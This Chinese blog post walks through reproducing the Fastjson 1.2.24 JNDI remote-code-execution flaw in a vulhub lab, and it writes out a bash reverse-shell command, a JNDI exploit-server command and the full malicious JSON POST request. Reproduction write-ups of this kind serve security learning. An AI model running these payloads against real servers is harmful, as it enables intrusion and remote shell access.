Fastjson 1.2.24 命令执行漏洞复现-JNDI简单实现反弹shell

已于 2023-12-06 17:02:53 修改
阅读量2.8k 收藏 10
点赞数 5
分类专栏: 漏洞复现 文章标签: web安全 安全 网络安全 系统安全 漏洞复现
于 2023-03-08 11:36:01 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43847838/article/details/129400075
版权

文章目录

前言

正好前几天有猫🐱问我这个漏洞,我就用我自己的简单办法来实现反弹shell,步骤完全没有你看过的那么复杂,跟着来绝对不会错。

漏洞原理这些文字我就不写了,大家自己网上搜吧。

提示:以下是本篇文章正文内容,下面案例可供参考

一、环境搭建

用docker启动vulhub的靶场就行了。
先去github下载一个vulhub靶场,进去fastjson1.2.24。
在这里插入图片描述

docker-compose up -d

在这里插入图片描述

二、漏洞复现准备

上面环境搭好之后,访问8090端口,就能看到。
在这里插入图片描述

看到上面的图片说明成功了,下面开始漏洞复现。

复现之前,只需要安装一个工具。
https://github.com/welk1n/JNDI-Injection-Exploit/releases/tag/v1.0

在这里插入图片描述

注意注意注意📢!!!
这里要用两个不同的web服务器,比如我就是拿一台云服务VPS搭建的漏洞靶场,也就是下图这张,为了方便记忆,我就叫他小5。因为尾号有65,所以叫他小5。

在这里插入图片描述

然后,把刚刚下载的JNDI工具放到另一台VPS服务器上,可以理解为我的攻击机。因为尾号是1,为方便记忆,直接叫他老大。

在这里插入图片描述

基础薄弱的小白看到这里可能就已经懵逼了,其实你用vmware虚拟机也是一样的,启动两台不同的虚拟机就行,但是攻击机一定要有java环境。为了方便理解,我画了一张图:

在这里插入图片描述

小5是靶机,真实渗透里,小5就是你要攻击的目标。

老大是攻击机,是下载了 JNDI工具的。真实渗透里,老大就是你自己的电脑。

所以所以所以📢!!小5和老大,你可以用两台虚拟机来搞,比如你想用kali作为你的攻击机,那老大就是你的kali,另一台虚拟机搭建了漏洞环境的,就是你的靶机小5,之所以弄两台,是为了不要让大家漏洞复现的时候,靶机攻击机一起来用,我看很多人都是用kali搭建漏洞环境,然后又用同一台kali来做攻击机,结果实战的时候连监听地址和反弹shell的地址老是傻傻分不清,所以尽量靶机和攻击机分开。(当然了,kali无非也是一个debain系统,也是可以用来做靶机的。不是说kali就非要拿来做攻击机……)

好了,上面都是解释,下面开始复现。

三、漏洞复现

反弹shell的命令是下面这个,9076是监听的端口,可以随意改,合理即可。

bash -i >& /dev/tcp/攻击机ip地址/9076 0>&1

因为我的攻击机IP地址是老大(尾号为1),所以我的反弹shell里的ip地址就要改成这个老大,然后base加密。机密的网站我都给你们找好了:

https://woj.app/jjm/
在这里插入图片描述

加密之后就变成了下面这种格式:

bash -c {echo,命令加密内容}|{base64,-d}|{bash,-i}

接着用老大里的JNDI工具,执行下面的命令:

java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,加密内容}|{base64,-d}|{bash,-i}" -A "攻击机IP"

在这里插入图片描述

紫色的就是payload。

然后另起一个终端,攻击机监听9999端口。为什么是9999?因为往上数第2张图我设置的就是9999端口呀。

在这里插入图片描述

然后到攻击步骤。
注意了,这里的Content-Type字段要application/json。否则不行。

POST / HTTP/1.1
Host: 靶机url
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/json
Content-Length: 160

{
    "b":{
        "@type":"com.sun.rowset.JdbcRowSetImpl",
        "dataSourceName":"payload",
        "autoCommit":true
    }
}

bp抓包,然后将Host和payload更改,发送请求:
在这里插入图片描述
成功反弹shell。

在这里插入图片描述

在老大的终端nc监听里,获取到了小5的shell。完美结束。

四、不成功的原因(排查):

1、靶机与攻击机之间是否能相互PING通。
2、payload(紫色的那些)有很多个,一个不行可以换下一个。
3、攻击机的端口是否开启了?因为很多云服务器的端口都是默认关闭的,比如腾讯云,阿里云,你需要去控制台更改安全策略,把你的监听端口以及payload的端口开启,要是嫌麻烦,可以像我一样,把所有端口开启。

以上3点都没问题,300%能复现成功。

总结

方法不止一个,不要将简单问题复杂化。

    文章原创,欢迎转载,请注明文章出处: Fastjson 1.2.24 命令执行漏洞复现-JNDI简单实现反弹shell.。百度和各类采集站皆不可信,搜索请谨慎鉴别。技术类文章一般都有时效性,本人习惯不定期对自己的博文进行修正和更新,因此请访问出处以查看本文的最新版本。

归去来兮-zangcc
关注
专栏目录
fastjson 1.2.24 反序列化导致任意命令执行漏洞复现
薛定谔嘚喵博客
05-30 1189
fastjson是阿里巴巴的开源JSON解析库,它可以解析JSON格式的字符串,的作用就是把java对象转换为json形式,也可 以用来将json转换为java对象。fastjson在解析json的过程中,支持使用autoType来实例化某一个具体的类,并调用该类的set/get方法来访问属性。通过查找代码中相关的方法,即可构造出一些恶意利用链。
漏洞复现-fastjson1.2.24-RCE
jazzz98的博客
06-27 413
(4)安装完成好后,新建一个java脚本,命名为TouchFile.java,这个文件的作用大致就是使用java创建一个文件,如下为其所有代码,本意为在靶场的tmp目录下创建一个名为。还有一个比较重要的问题就是,攻击思路为:使用Ubuntu的java加载一个调用恶意文件的环境,再使用该环境远程加载一个恶意类,达到借刀进行命令执行的效果。(3)由于我的环境已经安装好恶意调用java的RMI服务,因此这里仅提供以下编译环境的命令,编译成功会出现绿色的"
漏洞复现】4. Gitlab exiftool远程命令执行漏洞(CVE-2021-22205)复现与分析
Zichel77的博客
03-21 1353
Gitlab是由Gitlab Inc.开发,基于网络的GIt仓库管理工具,且具有wiki和issue跟踪功能,使用Git作为代码管理工具,并在此基础上搭建起来的Web服务,通过Web界面进行访问公开的或私人的项目。2021年4月5日,GitLab官方发布安全更新修复了此GitLab命令执行漏洞(CVE-2021-22205)。
Fastjson 1.2.24反序列化漏洞复现
m0_54899775的博客
01-16 4557
Fastjson 1.2.24反序列化漏洞复现 创建文件,反弹shell
log4j2远程代码执行漏洞原理与漏洞复现(基于vulhub,保姆级的详细教程)_log4j漏洞复现
最新发布
heike_Ch的博客
08-14 1220
log4j2是2021年底爆出的非常严重的漏洞,可谓是风靡一时,“血洗互联网”,也是安全公司面试的常见题目,我们应该了解这个漏洞的原理及利用方式。如何排查是否受到了攻击?检查日志中是否存在"jndi:ldap://"、"jndi:rmi//"等字符来发现可能的攻击行为,前面复现的过程在payload的构造中都出现了这样的字符串,这是攻击的典型标志。如何对log4j2的攻击进行防御?1.设置log4j2.formatMsgNoLookups=True。
【网路安全---漏洞复现Fastjson 1.2.24 命令执行漏洞复现-JNDI简单实现反弹shell(CVE-2017-18349)
m0_67844671的博客
09-27 1895
fastjson是阿里巴巴的开源JSON解析库,它可以解析JSON格式的字符串,支持将Java Bean序列化为JSON字符串,也可以从JSON字符串反序列化到JavaBean。即fastjson的主要功能就是将Java Bean序列化成JSON字符串,这样得到字符串之后就可以通过数据库等方式进行持久化了。看了很多别人关于漏洞复现过程,很多博客过程简洁,有的过程过于复杂,比如看到写java代码,用javac进行编译等等。所以我想写出比较详细的漏洞复现过程。
FastJson远程代码执行漏洞基于JNDI反弹shell使用
hapenl的博客
10-13 5183
FastJson组件1.2.24及之前版本存在远程代码执行漏洞(CVE-2017-18349)。本文讲解的是基于JNDI反弹shell操作。
Fastjson 1.2.24 反序列化漏洞复现
huangyongkang666的博客
04-15 3763
fastjson 1.2.24 反序列化漏洞复现 1.漏洞介绍 FastjsonEngine是其中的一个JSON处理引擎。Fastjson是其中的一个基于Java的JSON解析器/生成器。 Pippo 1.11.0版本中的FastjsonEngine所使用的Fastjson 1.2.25之前版本的parseObject存在安全漏洞。利用fastjson autotype在处理json对象时,未对@type字段进行安全安全性验证,攻击者可以传入危险类,并调用危险类连接远程RMI主机,通过其中的恶意类执行代码
fastjson 1.2.24漏洞复现
qq_18831583的博客
01-13 878
fastjson 1.2.24漏洞复现
fastjson 1.2.24反序列化漏洞
weixin_68547367的博客
01-04 1267
fastjson是一个Java语言编写的高性能且功能完善的JSON库,它采用一种“假定有序快速匹配”的算法,把JSON Parse的性能提升到了极致,它的接口简单易用,已经被广泛使用在缓存序列化,协议交互,Web输出等各种应用场景中。在网络传输的过程中,RMI中的对象是通过序列化方式进行编码传输的,这意味着,RMI在接收到经过序列化编码的对象后进行反序列化。java.io.Serializable:表示序列化,是一个空接口,也就是说这个接口没有声明任何的方法,所以实现这个接口的类也就不需要实现任何的方法。
漏洞复现 - - - Fastjson反序列化漏洞
weixin_67503304的博客
08-25 6396
简单讲解Fastjson反序列化漏洞简单讲述漏洞利用shell
fastjson_rce_tool:fastjson命令执行自动化利用工具,远程执行代码,JNDI服务利用工具RMILDAP
03-31
fastjson_rce_tool java -jar fastjson_tool.jar Usage: java -cp fastjson_tool.jar fastjson.HRMIServer 127.0.0.1 80 "curl dnslog.wyzxxz.cn" java -cp fastjson_tool.jar fastjson.HLDAPServer 127.0.0.1 80 "curl dnslog.wyzxxz.cn" java -cp fastjson_tool.jar fastjson.HLDAPServer2 127.0.0.1 80 "whoami" java -cp fastjson_tool.jar fastjson.LDAPRefServerAuto 127.0.0.1 1099 file=filename tamper=tohex java -cp
JNDIExploit:用于JNDI注入攻击的恶意LDAP服务器
03-19
JNDI漏洞利用 一款用作JNDI注入利用的工具,大量参考/引用了Rogue JNDI项目的代码,支持直接插入植入内存shell ,并集成了常见的bypass 高版本JDK的方式,适用于与自动化工具配合使用。 使用说明 使用java -jar JNDIExploit.jar -h查看参数说明,其中--ip参数为必选参数 Usage: java -jar JNDIExploit.jar [options] Options: * -i, --ip Local ip address -l, --ldapPort Ldap bind port (default: 1389) -p, --httpPort Http bind port (default: 8080) -u, --usage Show usage (default: false)
fastJson1.2.24漏洞复现
@起风了的博客
05-06 750
背景 fastJson1.2.25版本之前的AutoType 是默认开启的,在1.2.25版本之后就是默认关闭的。 而作怪的就是这个AutoType 恶意类 public class Attack { public Attack() { try { //打开本地计算器 String commands = "calc.exe"; Process pc = Runtime.getRuntime().exec(com
【vulhub漏洞复现Fastjson 1.2.24反序列化漏洞
RexHa的博客
03-06 3909
Fastjson 是一个 Java 库,可以将 Java 对象转换为 JSON 格式,也可以将 JSON 字符串转换为 Java 对象。 漏洞成因: 目标网站在解析 json 时,未对 json 内容进行验证,直接将 json 解析成 java 对象并执行,攻击者构造对应的 payload ,让系统执行,就能达到代码执行,甚至命令执行的目的。
fastjson-1.2.24漏洞复现
qq_43599126的博客
07-04 1202
看完利用链分析后,我们来总结一下,整体来说就是fastjson是根据@type来进行反序列化类并且没有做任何限制,允许指定@type来反序列化任意类,所以导致了反序列化漏洞
Fastjson1.2.24-RCE 漏洞复现(CVE-2017-18349)
oiadkt的博客
04-12 1168
Fastjson1.2.24-RCE 漏洞复现(CVE-2017-18349)
漏洞复现 -“核弹”漏洞-Log4j2 JNDI注入(CVE-2021-44228)
菜鸟的测试世界
05-07 981
漏洞被评为“核弹”级别,实在是log4j使用范围太广了,只要写java的,没几个没听过用过log4j吧。 漏洞原理 利用jndi的Lookup功能,实现jndi注入命令执行 影响范围 log4j 2.0-beta9到2.15.0(1.* 版本不受影响) 复现环境 jdk: 1.8.0_181 log4j:2.14.1 OS:Win10 复现步骤 1. 创建一个springboot的工程,验证当前的log4j库是否存在漏洞。 能解析${}表达式的才存在漏洞,官网的log...
FastJson1.2.24漏洞复现(详细步骤)
qq_35713681的博客
07-28 454
此测试用的是VM搭的Kali 2023.2。
程序包com.sun.jndi.toolkit.url不存在
05-23
com.sun.jndi.toolkit.url是Java命名和目录接口(JNDI)的一部分,它提供了一个URL类来处理JNDI URL。如果您的程序中使用了该包中的类或方法,并且提示找不到该包,可能有以下几种情况: 1. 您的Java环境中没有包含该包的类库,您可以尝试更新或安装该类库。 2. 您的程序中没有正确引用该包中的类或方法,您可以检查一下代码中是否正确引用了该包。 3. 您的程序中使用了已经被废弃的类或方法,建议使用替代方案来替代废弃的类或方法。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

归去来兮-zangcc

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值